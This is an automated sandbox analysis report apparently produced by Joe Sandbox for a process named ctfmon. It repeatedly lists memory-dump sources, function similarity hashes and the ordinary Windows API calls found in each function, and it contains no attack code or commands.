        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$LockUnlocklstrlen
        • String ID: @
        • API String ID: 1794151802-2766056989
        • Opcode ID: 19f1ada7404a33da66b8377d13e41d9c87f9e0be39e69b3cb761517a8f65d2a1
        • Instruction ID: 56caa2758e9c52820e3943fc16772618d0e7bec53ae05310eb2a7808f0609bc1
        • Opcode Fuzzy Hash: 19f1ada7404a33da66b8377d13e41d9c87f9e0be39e69b3cb761517a8f65d2a1
        • Instruction Fuzzy Hash: 89311A32900616EBCF14DF94D8856AFBBB4FF00354F5485AAD805AB280D3789E46CF98
        APIs
        • GetMenuCheckMarkDimensions.USER32 ref: 00427E76
        • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00427F25
        • LoadBitmapW.USER32(00000000,00007FE3), ref: 00427F3D
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
        • String ID:
        • API String ID: 2596413745-3916222277
        • Opcode ID: db58282b4df4703b6be70dacb1c37d709e8e39aa73eeb00070300ebe435444dc
        • Instruction ID: 3dac30640d0aaed0d39e7c8ba4964ad4c3cd7e2de72bd744148c463c93ab964f
        • Opcode Fuzzy Hash: db58282b4df4703b6be70dacb1c37d709e8e39aa73eeb00070300ebe435444dc
        • Instruction Fuzzy Hash: 0C213772F00225AFDB20CF78DC85BAE7BB8EB44314F4541A6E505EB2C2D7749A058B54
        APIs
        • WaitForSingleObject.KERNEL32(00000334,00007530), ref: 00402AFA
        • ResetEvent.KERNEL32(00000334), ref: 00402B07
        • SetEvent.KERNEL32(00000334), ref: 00402B81
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Event$ObjectResetSingleWait
        • String ID: DW-FI
        • API String ID: 463700304-2755525259
        • Opcode ID: 77e71a0a3001afed1319dc65d17983fcbb58cc41980ad582d64b4abd8d7ed811
        • Instruction ID: aee5816b9cca93473e57ae48154deca15eed2f9060ecf18fe0870dd8285205ab
        • Opcode Fuzzy Hash: 77e71a0a3001afed1319dc65d17983fcbb58cc41980ad582d64b4abd8d7ed811
        • Instruction Fuzzy Hash: 6A110876600301AFC318DF54EC889A67BB0FB98300F40482CF51563391E778954EDBB2
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412467
        • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041247D
        • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00416871,?,?,?,00000000,00000001), ref: 004124B0
        • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412518
        • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00416871,?), ref: 0041253D
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$ByteCharMultiWide
        • String ID: qhA
        • API String ID: 352835431-109923292
        • Opcode ID: 6d5b90a513fa248b65a245d60c829699e2c4e82a03b465a479beee4ee89a78f2
        • Instruction ID: ede44e41d23e5143c76023491ad2abd4dbb5e4cc9370e92a33f97a9eab123c69
        • Opcode Fuzzy Hash: 6d5b90a513fa248b65a245d60c829699e2c4e82a03b465a479beee4ee89a78f2
        • Instruction Fuzzy Hash: CB113A32A00549EBCF228F84CE41ADEBBB6EB48750F548156F924B2160D37A8DB1DB58
        APIs
        • GetWindowLongW.USER32(00000000,000000F0), ref: 00426961
        • GetClassNameW.USER32(00000000,?,0000000A), ref: 0042697C
        • lstrcmpiW.KERNEL32(?,combobox,?,00407730,00000000), ref: 0042698B
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClassLongNameWindowlstrcmpi
        • String ID: combobox
        • API String ID: 2054663530-2240613097
        • Opcode ID: b568a861b1d0005741e50548d822f09965c5ca395dea38605e49c47c066aead6
        • Instruction ID: 5a3d263a88e3f3d6520d42c127d3d6d56894c682c1a0552d8ed4dfe0903393cf
        • Opcode Fuzzy Hash: b568a861b1d0005741e50548d822f09965c5ca395dea38605e49c47c066aead6
        • Instruction Fuzzy Hash: 8AE06571754119BBCF11AF64DC4AE6F3B68A701341FA08222B412E51A1DA34E5968A6A
        APIs
        • GetModuleHandleA.KERNEL32(KERNEL32,0040F086), ref: 00414670
        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00414680
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AddressHandleModuleProc
        • String ID: IsProcessorFeaturePresent$KERNEL32
        • API String ID: 1646373207-3105848591
        • Opcode ID: cba9025a4e58730a40b0ce5ae999992da777c126b06903a960d1670945a4db02
        • Instruction ID: e08e1aaa38df6158061f31c1e92fe184261e3872a30fdf9be053d858ffc3e291
        • Opcode Fuzzy Hash: cba9025a4e58730a40b0ce5ae999992da777c126b06903a960d1670945a4db02
        • Instruction Fuzzy Hash: 19C01270BC0302E6DA241BF02C99FAA332C0F82B8AF9502B26205E0094CE9DC086903D
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e057c685b8e04973fb86481a5bafb9ccc88721ad8346fa567317af4b44edc4b7
        • Instruction ID: c53f18b298c334f67eaf08f9ae9cc2dd99c59691f0b3e42a7d6712c8fe277865
        • Opcode Fuzzy Hash: e057c685b8e04973fb86481a5bafb9ccc88721ad8346fa567317af4b44edc4b7
        • Instruction Fuzzy Hash: 24910472D01214AACF31AB69DD40ADF7A78EB55764F20023BFC14B66D1D33A5D848BAC
        APIs
        • HeapAlloc.KERNEL32(00000000,00002020,00439C00,00439C00,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138AC
        • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138D0
        • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138EA
        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000,?), ref: 004139AB
        • HeapFree.KERNEL32(00000000,00000000,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000,?,00000000), ref: 004139C2
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AllocVirtual$FreeHeap
        • String ID:
        • API String ID: 714016831-0
        • Opcode ID: 0db23876d43320ec6d75b9ad4236e14d53901b6169a70531498ac103299d6751
        • Instruction ID: e0fbc1c5489a36fa46b370c331ae166ff60e5c5d4513b139ca63262e897aab2f
        • Opcode Fuzzy Hash: 0db23876d43320ec6d75b9ad4236e14d53901b6169a70531498ac103299d6751
        • Instruction Fuzzy Hash: F631CFB0640701ABD3308F24DC45BA6BBE4EB44756F10953AE1969B390EBB8A985CB4C
        APIs
        • __EH_prolog.LIBCMT ref: 00409478
        • VariantClear.OLEAUT32(?), ref: 0040952A
        • CoTaskMemFree.OLE32(?,?,?,00000000), ref: 004095C7
        • CoTaskMemFree.OLE32(?,?,?,00000000), ref: 004095D5
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FreeTask$ClearH_prologVariant
        • String ID:
        • API String ID: 82050969-0
        • Opcode ID: d2642242818b26fdcc6663fd75fc7c676c46f1b02790232841b3b04f76bc45c1
        • Instruction ID: 7a4f58fe1ca51ad8bd86bb919bdeb9b1e6d69dac6bd0573dd5a3036f94321626
        • Opcode Fuzzy Hash: d2642242818b26fdcc6663fd75fc7c676c46f1b02790232841b3b04f76bc45c1
        • Instruction Fuzzy Hash: A9613C32600601DFCB20DFA5D9C496AB7F6BF48304754497EE146AB7A2CB39EC46CB54
        APIs
        • IsWindowVisible.USER32(?), ref: 004097CC
        • GetDesktopWindow.USER32 ref: 004097DF
        • GetWindowRect.USER32(?,?), ref: 004097F2
        • GetWindowRect.USER32(?,?), ref: 004097FF
          • Part of subcall function 004242D8: MoveWindow.USER32(?,?,?,00000000,?,?,?,00409940,?,?,?,?,00000000), ref: 004242F4
          • Part of subcall function 00424368: ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Rect$DesktopMoveShowVisible
        • String ID:
        • API String ID: 3835705305-0
        • Opcode ID: 9fe17d1fd798bb8d12ebb8ab7df9e78622e9de790cc82c01f0b05aff3212d542
        • Instruction ID: 8b8ab32d8fa83548fa5c41fe31c716bdd51a77ece67491eaac64cceb9160e636
        • Opcode Fuzzy Hash: 9fe17d1fd798bb8d12ebb8ab7df9e78622e9de790cc82c01f0b05aff3212d542
        • Instruction Fuzzy Hash: 17512C71A0021AEFCB04DFA9D984DAEB7B9FF89704B60446DF106E72A1C735AD01CB24
        APIs
        • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,0053CB6B,?), ref: 0041271F
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 0beaa2698218d78696dd47d2982e71bd7d2d39d4c449e83d80399bd80f9cc640
        • Instruction ID: 79ff61329588fcd8c51eb6643ed27d011935784b492264ec9ea3890574dd97e0
        • Opcode Fuzzy Hash: 0beaa2698218d78696dd47d2982e71bd7d2d39d4c449e83d80399bd80f9cc640
        • Instruction Fuzzy Hash: 8E51D971900108EFCB11CF58C984BDE7BB4FF41350F2045A6E415DB2A1D774DA91CB59
        APIs
        • GetPropA.USER32(?,?), ref: 0041EF36
        • CallWindowProcA.USER32(00000000), ref: 0041EF61
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID:
        • API String ID: 2276450057-0
        • Opcode ID: 3cb7a389d14d3f0a8cba7efc88d81151684dd99c2d336f3c1b205e18befae0c2
        • Instruction ID: 8146b5ed783db7286c47fb04c36b5b3a6faea0ea761c2a130bf3399523f472a8
        • Opcode Fuzzy Hash: 3cb7a389d14d3f0a8cba7efc88d81151684dd99c2d336f3c1b205e18befae0c2
        • Instruction Fuzzy Hash: 8C31EB7EB0420477D6209A1AFC859EFB398E78A725F540537FD0593281D32DA9CB826F
        APIs
        • InterlockedIncrement.KERNEL32(0053FD88), ref: 0040D819
        • InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D828
        • InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D85B
        • InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D8F3
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Interlocked$Decrement$Increment
        • String ID:
        • API String ID: 2574743344-0
        • Opcode ID: 4e5beb613688aa6a5769420d8b65ae6e065b65cce6616efb684ed729ddedf4ef
        • Instruction ID: 58385c7f67a3b939472f6390f75cdd142ca35eef3932e53f8a3f89b6430db689
        • Opcode Fuzzy Hash: 4e5beb613688aa6a5769420d8b65ae6e065b65cce6616efb684ed729ddedf4ef
        • Instruction Fuzzy Hash: 2E31F772D04215BFEB222BE1DC45BDB7FA49B01760F10807AF514A62D1CABC49C59B69
        APIs
        • lstrlenA.KERNEL32(?), ref: 00423B6A
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00423B8E
        • SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 00423BAE
        • SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 00423BCF
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ItemMessageSend$ByteCharMultiWidelstrlen
        • String ID:
        • API String ID: 3573766508-0
        • Opcode ID: a592d27849eff0fa8447953063a19a73d30d105c969762ad8121cc897157904e
        • Instruction ID: de0fd43411457c5723b9be473549cbaf37af971f57f089916a64043c4807ceea
        • Opcode Fuzzy Hash: a592d27849eff0fa8447953063a19a73d30d105c969762ad8121cc897157904e
        • Instruction Fuzzy Hash: C731D674A00228AADF209F59EC449EBBFB8EB45721F904117F95196291C63C6E42CB29
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D2A
        • MultiByteToWideChar.KERNEL32(?,00000009,0040F46A,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D3D
        • MultiByteToWideChar.KERNEL32(?,00000001,0040F46A,?,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D89
        • CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417DA1
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ByteCharMultiWide$CompareString
        • String ID:
        • API String ID: 376665442-0
        • Opcode ID: 65ab36382bc29e86771259d41d7cca30bc31e0b2db2b04251ba98a1bf3e1983a
        • Instruction ID: 0d49b2e9ac122ba47de66c770f7317a9987938b808b70659a99207eb4e60ffc5
        • Opcode Fuzzy Hash: 65ab36382bc29e86771259d41d7cca30bc31e0b2db2b04251ba98a1bf3e1983a
        • Instruction Fuzzy Hash: 2121183690021EEFCF218F94DC419EEBFB5FF48750F10416AFA1462160C7369962DBA4
        APIs
        • GetPropA.USER32(?,?), ref: 0041CD4D
        • SendMessageA.USER32(?,00001944,00000000,?), ref: 0041CD72
        • SendMessageA.USER32(?,00001943,00000000,?), ref: 0041CD87
        • RemovePropA.USER32(?,?), ref: 0041CD9D
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MessagePropSend$Remove
        • String ID:
        • API String ID: 2793251306-0
        • Opcode ID: daef66e987881a51772ba138ed3b8eadad13992640693e56edf310bc52bb590e
        • Instruction ID: cdf8bf3b115a00345220dc762a3e71ecc87d4dae19ac6484943eac8265a5b6fa
        • Opcode Fuzzy Hash: daef66e987881a51772ba138ed3b8eadad13992640693e56edf310bc52bb590e
        • Instruction Fuzzy Hash: FD11AB796403107AE210AB14AC45FFF775CEB99715F404439FD1496280E27CA94A8BBF
        APIs
        • __EH_prolog.LIBCMT ref: 00429875
        • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,00000000,00000000,00000000,?,?,00435D10,00000000,?,0042AC21,00000000), ref: 004298E5
        • lstrcpynW.KERNEL32(0042AC21,00000000,?,?,00435D10,00000000,?,0042AC21,00000000,?,?,?,?,00000000), ref: 00429902
        • LocalFree.KERNEL32(00000000,?,00435D10,00000000,?,0042AC21,00000000,?,?,?,?,00000000), ref: 0042990B
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FormatFreeH_prologLocalMessagelstrcpyn
        • String ID:
        • API String ID: 1069405352-0
        • Opcode ID: 5b21970f33e5bf9ba5f39fdf96f7e2f0bfcdcf2c450e68c32a7aaf4442d72fee
        • Instruction ID: fdd3b3ea3dca44e7a97c76a848adebdcda81641acace6f1e1dd778b80c94f713
        • Opcode Fuzzy Hash: 5b21970f33e5bf9ba5f39fdf96f7e2f0bfcdcf2c450e68c32a7aaf4442d72fee
        • Instruction Fuzzy Hash: 5C112232610328FBCB20AF91EC05AEF7FA8FF08760F50441AF9089A190D3759A51CBD8
        APIs
